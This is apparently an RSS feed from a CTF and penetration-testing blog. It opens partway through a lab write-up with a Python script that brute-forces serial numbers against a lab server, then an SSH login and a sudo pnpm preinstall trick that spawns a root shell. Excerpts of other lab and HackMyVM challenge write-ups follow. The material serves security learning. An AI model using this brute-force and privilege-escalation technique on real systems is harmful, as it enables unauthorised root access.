┌──(kali㉿kali)-[/mnt/hgfs/gx/2026bak]                                                                                                                                             
└─$ vim bp.py                                                                                                                                                               
┌──(kali㉿kali)-[/mnt/hgfs/gx/2026bak]
└─$ cat bp.py             
import hashlib
import json
import queue
import threading
import requests

KEY = '6K+35LiN6KaB5bCd6K+V5pq05Yqb56C06Kej77yM5LuU57uG55yL55yL5Yqg5a+G5rqQ5Luj56CB44CC'
VI = 'Jkdsfojweflk0024564555*'

def generate_all_hashes():
    hashes = []
    for i1 in range(12):
        s1 = KEY[i1]
        for i2 in range(9):
            s2 = KEY[i2]
            for i3 in range(8):
                s3 = KEY[i3]
                for i4 in range(7):
                    s4 = KEY[i4]
                    for i5 in range(6):
                        s5 = VI[i5]
                        s = s1 + s2 + s3 + s4 + s5
                        md5_hex = hashlib.md5(s.encode()).hexdigest()
                        hashes.append(md5_hex)
    return hashes

def worker(q, result, url):
    headers = {'Content-Type': 'application/json'}
    while not result and not q.empty():
        try:
            hash_sn = q.get_nowait()
            data = json.dumps({'sn': hash_sn})
            response = requests.post(url, headers=headers, data=data, timeout=5)
            if response.status_code == 200:
                try:
                    resp_data = response.json()
                    if resp_data.get('code') == 200:
                        result.append(hash_sn)
                        print(f'[+] Success! Found Valid SN: {hash_sn}')
                        return
                    else:
                        print(f"[-] Failed: {hash_sn} -&gt; {resp_data.get('msg', 'Unknown error')}")
                except json.JSONDecodeError:
                    print(f'[-] Failed (Invalid JSON): {hash_sn}')
            else:
                print(f'[-] Failed (HTTP {response.status_code}): {hash_sn}')
        except Exception as e:
            print(f'[!] Error with {hash_sn}: {str(e)}')
        finally:
            q.task_done()

if __name__ == '__main__':
    SERVER_URL = 'http://192.168.205.131:8080/checkSN'
    all_hashes = generate_all_hashes()
    print(f'Generated {len(all_hashes)} hashes. Starting爆破...')

    task_queue = queue.Queue()
    for h in all_hashes:
        task_queue.put(h)

    valid_hash = []
    num_threads = 8
    threads = []

    for _ in range(num_threads):
        t = threading.Thread(target=worker, args=(task_queue, valid_hash, SERVER_URL))
        t.daemon = True
        t.start()
        threads.append(t)

    task_queue.join()

    if valid_hash:
        print(f'[+] Valid hashSN found: {valid_hash[0]}')
    else:
        print('[-] No valid hashSN found.')
                                                                     
┌──(kali㉿kali)-[/mnt/hgfs/gx/2026bak]
└─$ python3 $_
Generated 36288 hashes. Starting爆破...
[-] Failed: 7e761b3333f90f1adb4b2bdb0192256f -&gt; Error: Invalid SN
(omitted)
[+] Success! Found Valid SN: ee5a82db0f9bf1c1903821477e11c067
```

SN: ee5a82db0f9bf1c1903821477e11c067, let's try it:

```
┌──(kali㉿kali)-[/mnt/hgfs/gx/2026bak]
└─$ curl -X POST -H 'Content-Type: application/json' -d '{"sn": "ee5a82db0f9bf1c1903821477e11c067"}' http://192.168.205.131:8080/checkSN
{"code":200,"data":"welcome:DPKU9-8APJ9-8XZJ0-8XZ08-7H111","msg":"Success: Valid SN "}
```

Log in:

```
┌──(kali㉿kali)-[/mnt/hgfs/gx/2026bak]
└─$ ssh welcome@192.168.205.131
The authenticity of host '192.168.205.131 (192.168.205.131)' can't be established.
ED25519 key fingerprint is SHA256:xJ90oWmr5sPR2afHz9etzSdtxINmLI+JvbwgV/iCsWY.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:16: [hashed name]
    ~/.ssh/known_hosts:17: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.205.131' (ED25519) to the list of known hosts.
welcome@192.168.205.131's password: 
=============================
Welcome!!!
QQ Group:660930334
=============================
lingdong:~$ id
uid=1000(welcome) gid=1000(welcome) groups=1000(welcome)
```

Look for information:

```
lingdong:~$ sudo -l
Matching Defaults entries for welcome on lingdong:
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for welcome:
    Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User welcome may run the following commands on lingdong:
    (ALL : ALL) NOPASSWD: /root/.local/share/pnpm/global-bin/pm2
    (ALL : ALL) NOPASSWD: /usr/bin/pnpm
```

Check whether there is a ready-made one.

Didn't find one, so look at the help text:

```
lingdong:~$ sudo /usr/bin/pnpm --help
Version 10.11.1 (compiled to binary; bundled Node.js v20.11.1)
Usage: pnpm [command] [flags]
       pnpm [ -h | --help | -v | --version ]

Manage your dependencies:
      add                  Installs a package and any packages that it depends on. By default, any new package is installed as a prod dependency
      import               Generates a pnpm-lock.yaml from an npm package-lock.json (or npm-shrinkwrap.json) file
   i, install              Install all dependencies for a project
  it, install-test         Runs a pnpm install followed immediately by a pnpm test
  ln, link                 Connect the local project to another one
      prune                Removes extraneous packages
  rb, rebuild              Rebuild a package
  rm, remove               Removes packages from node_modules and from the project's package.json
      unlink               Unlinks a package. Like yarn unlink but pnpm re-installs the dependency after removing the external link
  up, update               Updates packages to their latest version based on the specified range

Review your dependencies:
      audit                Checks for known security issues with the installed packages
      licenses             Check licenses in consumed packages
  ls, list                 Print all the versions of packages that are installed, as well as their dependencies, in a tree-structure
      outdated             Check for outdated packages

Run your scripts:
      exec                 Executes a shell command in scope of a project
      run                  Runs a defined package script
      start                Runs an arbitrary command specified in the package's "start" property of its "scripts" object
   t, test                 Runs a package's "test" script, if one was provided

Other:
      cat-file             Prints the contents of a file based on the hash value stored in the index file
      cat-index            Prints the index file of a specific package from the store
      find-hash            Experimental! Lists the packages that include the file with the specified hash.
      pack                 Create a tarball from a package
      publish              Publishes a package to the registry
      root                 Prints the effective modules directory

Manage your store:
      store add            Adds new packages to the pnpm store directly. Does not modify any projects or files outside the store
      store path           Prints the path to the active store directory
      store prune          Removes unreferenced (extraneous, orphan) packages from the store
      store status         Checks for modified packages in the store

Options:
  -r, --recursive          Run the command for each project in the workspace.
```



This looks a lot like npm. It's basically the same thing as npm, right? Let's try:

![image-20250608122239857](https://7r1umph.top/image/20250608122240292.webp)

```
lingdong:~$ TF=$(mktemp -d)
lingdong:~$ echo '{"scripts": {"preinstall": "/bin/sh"}}' &gt; $TF/package.json
lingdong:~$ sudo pnpm -C $TF --unsafe-perm i
Already up to date

&gt; @ preinstall /tmp/tmp.ggFJFL
&gt; /bin/sh

/tmp/tmp.ggFJFL # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
```

That works. Grab the flags:

```
/tmp/tmp.ggFJFL # cat /root/root.txt 
flag{root-b89ed76b27e91ad5d773ddadae256072}
/tmp/tmp.ggFJFL # cat /home/welcome/user.txt 
flag{user-afc8b494c5ba167971f10274f5a81534}
```</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/nei-bu-_bughash.html</guid><pubDate>Sun, 08 Jun 2025 07:39:18 +0000</pubDate></item><item><title>内部_Eva</title><link>https://7r1UMPH.github.io/post/nei-bu-_Eva.html</link><description>![image-20250608102554020](https://7r1umph.top/image/20250608102601444.webp)

Let's get to it.

Discover the IP:

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ sudo arp-scan -l                                      
[sudo] password for kali: 
Interface: eth0, type: EN10MB, MAC: 00:0c:29:af:40:3a, IPv4: 192.168.205.206
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.205.1   00:50:56:c0:00:08       VMware, Inc.
192.168.205.2   00:50:56:f4:ef:6f       VMware, Inc.
192.168.205.130 08:00:27:9c:35:56       PCS Systemtechnik GmbH
192.168.205.254 00:50:56:ed:18:9e       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.044 seconds (125.24 hosts/sec). 4 responded
                       
```

Target IP 192.168.205.130; enumerate services:

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ nmap -p- 192.168.205.130            
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-07 22:27 EDT
Nmap scan report for 192.168.205.130
Host is up (0.00022s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:9C:35:56 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.21 seconds
                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ nmap -p22,80 -sC -sV 192.168.205.130
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-07 22:28 EDT
Nmap scan report for 192.168.205.130
Host is up (0.00034s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: \xE2\x9D\x80 \xE9\xBE\x8D \xC2\xB7 \xE8\xA6\xBA\xE9\x86\x92 \xE2\x9D\x80
MAC Address: 08:00:27:9C:35:56 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.13 seconds

```

Standard procedure: look at the web server.

![1](https://7r1umph.top/image/20250608102947610.webp)

A page about the novel 《龙族》 (Dragon Raja).
Looked through the source code; nothing there.

Directory brute-forcing:

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ dirsearch -u http://192.168.205.130/                                
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /mnt/hgfs/gx/reports/http_192.168.205.130/__25-06-07_22-30-53.txt

Target: http://192.168.205.130/

[22:30:53] Starting: 
[22:30:54] 403 -  280B  - /.ht_wsr.txt
[22:30:54] 403 -  280B  - /.htaccess.bak1
[22:30:54] 403 -  280B  - /.htaccess.orig
[22:30:54] 403 -  280B  - /.htaccess.sample
[22:30:54] 403 -  280B  - /.htaccess.save
[22:30:54] 403 -  280B  - /.htaccess_extra
[22:30:54] 403 -  280B  - /.htaccess_sc
[22:30:54] 403 -  280B  - /.htaccess_orig
[22:30:54] 403 -  280B  - /.htaccessBAK
[22:30:54] 403 -  280B  - /.htaccessOLD
[22:30:54] 403 -  280B  - /.htaccessOLD2
[22:30:54] 403 -  280B  - /.htm
[22:30:54] 403 -  280B  - /.html
[22:30:54] 403 -  280B  - /.htpasswd_test
[22:30:54] 403 -  280B  - /.htpasswds
[22:30:54] 403 -  280B  - /.httr-oauth
[22:30:54] 403 -  280B  - /.php
[22:31:14] 403 -  280B  - /server-status
[22:31:14] 403 -  280B  - /server-status/

Task Completed
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ gobuster dir -u http://192.168.205.130/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt  -x php,txt,html,zip -t 64
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.205.130/
[+] Method:                  GET
[+] Threads:                 64
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 280]
/.html                (Status: 403) [Size: 280]
/index.html           (Status: 200) [Size: 12224]
/dragon.php           (Status: 200) [Size: 10284]
Progress: 76819 / 1102800 (6.97%)
```

Found a /dragon.php; take a look at it first.
![image-20250608103236313](https://7r1umph.top/image/20250608103236778.webp)

There are four incantations (言灵); dig through the source code.
The key part of the source:

```
&lt;div class='incantation-name' data-name='divinedecree'&gt;
                DivineDecree
                &lt;div class='tooltip'&gt;
                    &lt;div class='tooltip-title'&gt;DIVINE DECREE&lt;/div&gt;
                    &lt;div class='tooltip-desc'&gt;
                        The holy light that illuminates all truth. This ability allows access to all knowledge and secrets.&lt;br&gt;&lt;br&gt;
                        ⚠️ WARNING: DivineDecree can reveal and read ALL content without restrictions. Handle with extreme care!
                    &lt;/div&gt;
                &lt;/div&gt;
            &lt;/div&gt;
```

'⚠️ Warning: DivineDecree can display and read ALL content without restriction.'</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/nei-bu-_Eva.html</guid><pubDate>Sun, 08 Jun 2025 07:26:38 +0000</pubDate></item><item><title>Challenge 20250526</title><link>https://7r1UMPH.github.io/post/Challenge%2020250526.html</link><description>## Part 1: Analysing the `ezflag` file

### 1. Initial file inspection

Download the challenge attachment to obtain a file named `ezflag`.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%2020250526.html</guid><pubDate>Mon, 26 May 2025 09:00:57 +0000</pubDate></item><item><title>内部_Qingmei</title><link>https://7r1UMPH.github.io/post/nei-bu-_Qingmei.html</link><description>## 1. Information gathering

### 1.1 Host discovery

Use `arp-scan` to scan the local network `192.168.205.0/24` and identify the target host.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/nei-bu-_Qingmei.html</guid><pubDate>Mon, 19 May 2025 04:04:57 +0000</pubDate></item><item><title>vulnyx_Denied</title><link>https://7r1UMPH.github.io/post/vulnyx_Denied.html</link><description># 1. Information gathering - target locked!

![image-20250519113211432](https://7r1umph.top/image/20250519113211569.webp)

This box is a pure replay for me, since I already know where its weak spot is.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/vulnyx_Denied.html</guid><pubDate>Mon, 19 May 2025 04:04:25 +0000</pubDate></item><item><title>eeeeeasy 靶机渗透测试Writeup</title><link>https://7r1UMPH.github.io/post/eeeeeasy%20-ba-ji-shen-tou-ce-shi-Writeup.html</link><description>Target name: eeeeeasy (a group member's box; it may be published on hackmyvm later)

Ha, judging by the name, is it saying 'too easy!' or 'eeee...easy?' Never mind, let's get to it!

### 1. Information gathering - found you!

As usual, first run `arp-scan` across the internal network to see where the target is.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/eeeeeasy%20-ba-ji-shen-tou-ce-shi-Writeup.html</guid><pubDate>Sun, 18 May 2025 06:30:37 +0000</pubDate></item><item><title>Challenge 015</title><link>https://7r1UMPH.github.io/post/Challenge%20015.html</link><description>**Challenge link:** https://hackmyvm.eu/challenges/challenge.php?c=015

![Challenge image](https://7r1umph.top//image/20250518141943225.webp)

## 1. Initial analysis

The challenge page shows a piece of text wrapped in a `&lt;pre&gt;` tag:

```html
&lt;pre&gt; push 7d616579 push 74696874 push 726f7773 push 696d7361 push 7b766d68 &lt;/pre&gt;
```

The text contains a series of `push` instructions followed by hexadecimal values.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20015.html</guid><pubDate>Sun, 18 May 2025 06:30:01 +0000</pubDate></item><item><title>Challenge 014</title><link>https://7r1UMPH.github.io/post/Challenge%20014.html</link><description># 1. Initial analysis

**Challenge link:** https://hackmyvm.eu/challenges/challenge.php?c=014

![Challenge image](https://7r1umph.top//20250518140930918.webp)


The challenge page states the task directly:

```
Find the flag in the domain http://momo.hackmyvm.eu
```

This indicates that the flag is hidden somewhere on the target domain `http://momo.hackmyvm.eu`.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20014.html</guid><pubDate>Sun, 18 May 2025 06:29:30 +0000</pubDate></item><item><title>Challenge 013</title><link>https://7r1UMPH.github.io/post/Challenge%20013.html</link><description>**Challenge link:** https://hackmyvm.eu/challenges/challenge.php?c=013

![Challenge image](https://7r1umph.top/image/20250518140039064.webp)

## 1. Initial analysis

Visiting the challenge page shows a piece of text wrapped in a `&lt;pre&gt;` tag:

```html
&lt;pre&gt; MXV{BNRNKWPCEUSEX} k:FLAG &lt;/pre&gt;
```

This text has two parts:
1.  `MXV{BNRNKWPCEUSEX}`: this looks like an encrypted flag format, where `MXV` is probably the encrypted prefix and `BNRNKWPCEUSEX` is the ciphertext.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20013.html</guid><pubDate>Sun, 18 May 2025 06:28:56 +0000</pubDate></item><item><title>Challenge 012</title><link>https://7r1UMPH.github.io/post/Challenge%20012.html</link><description># Challenge 012


**Challenge link:** https://hackmyvm.eu/challenges/challenge.php?c=012

![Challenge image](https://7r1UMPH.top/image/20250518110545680.webp)

## 1. Initial analysis

Download the file:

```bash
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ ll 012.zip 012.mp3 
-rwxr-xr-x 1 kali kali 17286 Mar  6  2022 012.mp3
-rwxr-xr-x 1 kali kali 16978 May 17 23:06 012.zip
```
First try to unzip `012.zip` directly, which extracts `012.mp3`.

### 2. Audio content analysis

Play the `012.mp3` file and listen carefully to its content.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20012.html</guid><pubDate>Sun, 18 May 2025 03:36:33 +0000</pubDate></item><item><title>Challenge 011</title><link>https://7r1UMPH.github.io/post/Challenge%20011.html</link><description># 1. Initial analysis

**Challenge link:** https://hackmyvm.eu/challenges/challenge.php?c=011

![Challenge image](https://7r1UMPH.top/image/20250518110146012.webp)


The challenge page shows a piece of text wrapped in a `&lt;pre&gt;` tag, which usually means its spaces and line breaks are preserved to keep the original layout.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20011.html</guid><pubDate>Sun, 18 May 2025 03:36:02 +0000</pubDate></item><item><title>Challenge 010</title><link>https://7r1UMPH.github.io/post/Challenge%20010.html</link><description># 1. Initial analysis

**Challenge link:** https://hackmyvm.eu/challenges/challenge.php?c=010

![Challenge image](https://7r1UMPH.top/image/20250518105910057.webp)


The challenge page directly shows a string that looks encoded:

```
853-3GB.eOG[ko/A7oS$FF=
```

The string contains upper- and lower-case letters, digits and some special symbols (`-`, `.`, `[`, `]`, `/`, `$`, `=`).</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20010.html</guid><pubDate>Sun, 18 May 2025 03:35:31 +0000</pubDate></item><item><title>Challenge 009</title><link>https://7r1UMPH.github.io/post/Challenge%20009.html</link><description># 1. Initial analysis

**Challenge link:** https://hackmyvm.eu/challenges/challenge.php?c=009

![Challenge image](https://7r1UMPH.top/image/20250518105248414.webp)


After visiting the link, the page shows a single line of text:

```html
The flag is here. &lt;!-- HMV{infrontofme} --&gt;
```
## 2. Flag

The final flag is:
```
HMV{infrontofme}
```
</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20009.html</guid><pubDate>Sun, 18 May 2025 03:35:00 +0000</pubDate></item><item><title>Challenge 008</title><link>https://7r1UMPH.github.io/post/Challenge%20008.html</link><description># Challenge 008


**Challenge link:** https://hackmyvm.eu/challenges/challenge.php?c=008

![Challenge image](https://7r1UMPH.top/image/20250518104404775.webp)

## 1. Initial analysis

The challenge provides a downloadable file: `008.zip`.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20008.html</guid><pubDate>Sun, 18 May 2025 03:34:29 +0000</pubDate></item><item><title>Challenge 007：反转字符与Base64解码分析</title><link>https://7r1UMPH.github.io/post/Challenge%20007%EF%BC%9A-fan-zhuan-zi-fu-yu-Base64-jie-ma-fen-xi.html</link><description># Initial observations

*   **Challenge link:** [https://hackmyvm.eu/challenges/challenge.php?c=007](https://hackmyvm.eu/challenges/challenge.php?c=007)


Visiting the challenge page shows the following specially processed string:

![image-20250518101535788](https://7r1UMPH.top/image/20250518101535983.webp)

The original string is:
```
=0Xd0ʞƐMOqWMςЯzɘWƖƎƧ
```
The string contains flipped characters and special Unicode characters; the initial assessment is that text reversal and character substitution are needed.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20007%EF%BC%9A-fan-zhuan-zi-fu-yu-Base64-jie-ma-fen-xi.html</guid><pubDate>Sun, 18 May 2025 03:33:58 +0000</pubDate></item><item><title>Challenge 006：TXT记录的秘密</title><link>https://7r1UMPH.github.io/post/Challenge%20006%EF%BC%9ATXT-ji-lu-de-mi-mi.html</link><description># Challenge information


*   **Challenge name/number:** Challenge 006
*   **Challenge link:** [https://hackmyvm.eu/challenges/challenge.php?c=006](https://hackmyvm.eu/challenges/challenge.php?c=006)

### Initial observations

![image-20250518100536187](https://7r1UMPH.top/image/20250518100536383.webp)

We get a hint like `'hackmyvm.eu. 100 IN TXT'`, so the target is very clear: go straight for the TXT record of `hackmyvm.eu`!

## Exploration process

With such a clear pointer, let's use `dig` to find out.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20006%EF%BC%9ATXT-ji-lu-de-mi-mi.html</guid><pubDate>Sun, 18 May 2025 03:33:27 +0000</pubDate></item><item><title>hmv_Disguise靶机渗透测试详解</title><link>https://7r1UMPH.github.io/post/hmv_Disguise-ba-ji-shen-tou-ce-shi-xiang-jie.html</link><description># 1. Information gathering and initial probing

## 1.1 Host discovery

The first step of a penetration test is usually to discover the live hosts on the network.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/hmv_Disguise-ba-ji-shen-tou-ce-shi-xiang-jie.html</guid><pubDate>Fri, 16 May 2025 12:21:22 +0000</pubDate></item><item><title>VulnHub Death Star: 1 渗透测试报告</title><link>https://7r1UMPH.github.io/post/VulnHub%20Death%20Star-%201%20-shen-tou-ce-shi-bao-gao.html</link><description>Target address: [https://www.vulnhub.com/entry/death-star-1,477/](https://www.vulnhub.com/entry/death-star-1,477/)

![image-20250515144334733](https://7r1UMPH.top/image/20250515144342235.webp)

### 1. Host discovery and port scanning

First, use `arp-scan` to find the target's IP address.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/VulnHub%20Death%20Star-%201%20-shen-tou-ce-shi-bao-gao.html</guid><pubDate>Thu, 15 May 2025 13:14:04 +0000</pubDate></item><item><title>靶机 X1 渗透测试报告</title><link>https://7r1UMPH.github.io/post/ba-ji-%20X1%20-shen-tou-ce-shi-bao-gao.html</link><description>Hello! Today I'll share the penetration process for the X1 box.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/ba-ji-%20X1%20-shen-tou-ce-shi-bao-gao.html</guid><pubDate>Thu, 15 May 2025 11:31:16 +0000</pubDate></item><item><title>HackMyVM 油猴辅助脚本</title><link>https://7r1UMPH.github.io/post/HackMyVM%20-you-hou-fu-zhu-jiao-ben.html</link><description>## 1. Background 🤔

Recently more new visitors seem to be stopping by my blog, and quite a few have been talked into playing **HackMyVM**.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/HackMyVM%20-you-hou-fu-zhu-jiao-ben.html</guid><pubDate>Fri, 02 May 2025 07:26:43 +0000</pubDate></item><item><title>Challenge 005 破解 Shadow 文件</title><link>https://7r1UMPH.github.io/post/Challenge%20005%20-po-jie-%20Shadow%20-wen-jian.html</link><description>### Challenge information

*   **Challenge name/number:** Challenge 005
*   **Challenge link:** [https://hackmyvm.eu/challenges/challenge.php?c=005](https://hackmyvm.eu/challenges/challenge.php?c=005)

### Initial observations

![image-20250502152010221](https://cdn.jsdelivr.net/gh/7r1UMPH/7r1UMPH.github.io@main/static/image/20250502152010304.png)

Visiting the challenge page, the description tells us that we obtained a target machine's `/etc/shadow` file but could not crack the `root` user's password.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20005%20-po-jie-%20Shadow%20-wen-jian.html</guid><pubDate>Fri, 02 May 2025 07:25:08 +0000</pubDate></item><item><title>Challenge 004 十六进制的秘密</title><link>https://7r1UMPH.github.io/post/Challenge%20004%20-shi-liu-jin-zhi-de-mi-mi.html</link><description>### Challenge information

*   **Challenge name/number:** Challenge 004
*   **Challenge link:** [https://hackmyvm.eu/challenges/challenge.php?c=004](https://hackmyvm.eu/challenges/challenge.php?c=004)

### Initial observations

![Challenge 004 page](https://cdn.jsdelivr.net/gh/7r1UMPH/7r1UMPH.github.io@main/static/image/20250502151318558.png)

Visiting the challenge page directly shows a long string made of digits and letters:

```
686d767b6d79666c61676973656173797d
```

The goal is to decode or convert this string to obtain the flag.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20004%20-shi-liu-jin-zhi-de-mi-mi.html</guid><pubDate>Fri, 02 May 2025 07:25:06 +0000</pubDate></item><item><title>Challenge 003 图中是谁？</title><link>https://7r1UMPH.github.io/post/Challenge%20003%20-tu-zhong-shi-shui-%EF%BC%9F.html</link><description>### Challenge information

*   **Challenge name/number:** Challenge 003
*   **Challenge link:** [https://hackmyvm.eu/challenges/challenge.php?c=003](https://hackmyvm.eu/challenges/challenge.php?c=003)

### Initial observations

![Challenge 003 page and question](https://cdn.jsdelivr.net/gh/7r1UMPH/7r1UMPH.github.io@main/static/image/20250502150751314.png)

Visiting the challenge page shows a question, 'Who is she?', along with a photo of a person.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20003%20-tu-zhong-shi-shui-%EF%BC%9F.html</guid><pubDate>Fri, 02 May 2025 07:25:04 +0000</pubDate></item><item><title>Challenge 002 源码之密</title><link>https://7r1UMPH.github.io/post/Challenge%20002%20-yuan-ma-zhi-mi.html</link><description>### Challenge information

*   **挑战名称/编号:** Challenge 002
*   **挑战链接:** [https://hackmyvm.eu/challenges/challenge.php?c=002](https://hackmyvm.eu/challenges/challenge.php?c=002)

### 初始观察

![挑战002初始界面](https://cdn.jsdelivr.net/gh/7r1UMPH/7r1UMPH.github.io@main/static/image/20250502150050288.png)

访问挑战页面后，页面内容提示我们需要访问另一个特定的 URL 来获取 Flag。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20002%20-yuan-ma-zhi-mi.html</guid><pubDate>Fri, 02 May 2025 07:25:02 +0000</pubDate></item><item><title>Challenge 001 Base64 编码解析</title><link>https://7r1UMPH.github.io/post/Challenge%20001%20Base64%20-bian-ma-jie-xi.html</link><description>### 挑战信息

*   **Challenge name/number:** Challenge 001
*   **Challenge link:** [https://hackmyvm.eu/challenges/challenge.php?c=001](https://hackmyvm.eu/challenges/challenge.php?c=001)

### Initial Observations

![Challenge 001 page](https://cdn.jsdelivr.net/gh/7r1UMPH/7r1UMPH.github.io@main/static/image/20250502145552213.png)

After opening the challenge page, we see that a string is displayed:

```
aG12e2Jhc2U2NGRlY29kZXJ9
```


The task is evidently to decode or interpret this string in order to obtain the Flag.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20001%20Base64%20-bian-ma-jie-xi.html</guid><pubDate>Fri, 02 May 2025 07:24:56 +0000</pubDate></item><item><title>Penetration Test Report - Neuroblue (Test Machine)</title><link>https://7r1UMPH.github.io/post/shen-tou-ce-shi-bao-gao-%20-%20Neuroblue%20%28-ce-shi-ba-ji-%29.html</link><description>## Penetration Test Report - Neuroblue

## 1. Introduction

**Target name**: Neuroblue
**Difficulty**: Easy
**Attacker IP:** `192.168.205.188` (Kali Linux)
**Target IP:** `192.168.205.203` (Neuroblue)

## 2. Information Gathering (Enumeration)

### 2.1. Network Discovery

Use `arp-scan` to discover live hosts on the local network.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/shen-tou-ce-shi-bao-gao-%20-%20Neuroblue%20%28-ce-shi-ba-ji-%29.html</guid><pubDate>Thu, 01 May 2025 10:56:07 +0000</pubDate></item><item><title>Penetration Test Report - Bamuwe (Test Machine)</title><link>https://7r1UMPH.github.io/post/shen-tou-ce-shi-bao-gao-%20-%20Bamuwe%20%28-ce-shi-ba-ji-%29.html</link><description>## Penetration Test Report - Bamuwe

## 1. Introduction

**Target name**: Bamuwe (unreleased internal test machine; may be published on HackMyVm later)
**Difficulty**: Easy
**Attacker IP:** `192.168.205.188` (Kali Linux)
**Target IP:** `192.168.205.197` (Bamuwe)

## 2. Information Gathering (Enumeration)

### 2.1. Network Discovery

Use `arp-scan` to discover live hosts on the local network.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/shen-tou-ce-shi-bao-gao-%20-%20Bamuwe%20%28-ce-shi-ba-ji-%29.html</guid><pubDate>Thu, 01 May 2025 00:25:56 +0000</pubDate></item><item><title>✨ A Fresh Look: My Blog Interface Beautification Journey ✨</title><link>https://7r1UMPH.github.io/post/%E2%9C%A8%20-huan-ran-yi-xin-%EF%BC%9A-wo-de-bo-ke-jie-mian-mei-hua-zhi-lv-%20%E2%9C%A8.html</link><description>Hello everyone!

If you have visited my blog often recently, you may have noticed that it has quietly got a "new face"! That's right: over the past while I have put quite a bit of effort into a fairly thorough beautification and upgrade of the blog's front-end interface.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/%E2%9C%A8%20-huan-ran-yi-xin-%EF%BC%9A-wo-de-bo-ke-jie-mian-mei-hua-zhi-lv-%20%E2%9C%A8.html</guid><pubDate>Mon, 28 Apr 2025 01:40:08 +0000</pubDate></item><item><title>Byxs20 Target Penetration Test Report (Write-Up)</title><link>https://7r1UMPH.github.io/post/Byxs20-ba-ji-shen-tou-ce-shi-bao-gao-%20%28Write-Up%29.html</link><description>*   **Target name:** Byxs20 (internal test - may be published on HackMyVm)
*   **Difficulty:** Easy
